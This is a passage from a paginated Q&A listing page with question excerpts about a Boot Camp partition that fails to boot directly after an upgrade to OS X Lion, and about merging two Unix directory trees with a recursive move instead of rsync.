for. Other users who have experienced the same error code all seem to have unrelated web configuration problems (certificate validation, for example). UPDATE in response to Phoshi's excellent suggestion, reinstallation hasn't done the trick.

    Read the article

  • Update to Lion, Cannot boot into Bootcamp partitions, but can use in Parallels

    - by Jon Jester
    Using Snow Leopard had boot camp partitions for both XP and Windows 7. These were both accessible through Parallels 7 or through direct boot through boot camp. Each is on a separate partitioned hard drive. Upgraded to Lion, both were still accessible through Parallels, but have not been able to directly boot into either. Unfortunately is important to me to be able to boot into a least the Windows 7 partition. Have tried virtually everything I can find online. Seen similar issues, but nothing where they were usable virtually but not directly. Nothing works. reFit, correcting the master boot records in Windows with command line, have wiped the Windows 7 partition clean and reinstalled Windows 7 several times 1st using Boot Camp4 drivers then using Boot Camp3 drivers. Have tried resizing the bootcamp partitions. When booting into the Boot Camp partitions directly will go all the way to seeing the desktop before it fails, where I get a Windows error screen. I can see all the disks and their appropriate partitions both in OS X disk utility as well as the Windows installer utility.

    Read the article

  • Recursive move utility on Unix?

    - by Thomas Vander Stichele
    Sometimes I have two trees that used to have the same content, but have grown out of sync (because I moved disks around or whatever). A good example is a tree where I mirror upstream packages from Fedora. I want to merge those two trees again by moving all of the files from tree1 into tree2. Usually I do this with: rsync -arv tree1/* tree2 Then delete tree1. However, this takes an awful lot of time and disk space, and it would be much easier to be able to do: mv -r tree1/* tree2 In other words, a recursive move. It would be faster because first of all it would not even copy, just move the inodes, and second I wouldn't need a delete at the end. Does this exist ? As a test case, consider the following sequence of commands: $ mkdir -p a/b $ touch a/b/c1 $ rsync -arv a/ a2 sending incremental file list created directory ./ b/ b/c1 b/c2 sent 173 bytes received 57 bytes 460.00 bytes/sec total size is 0 speedup is 0.00 $ touch a/b/c2 What command would now have the effect of moving a/b/c2 to a2/b/c2 and then deleting the a subtree (since everything in it is already in the destination tree) ?

    Read the article

< Previous Page | 619 620 621 622 623 624 625 626 627 628 629 630  | Next Page >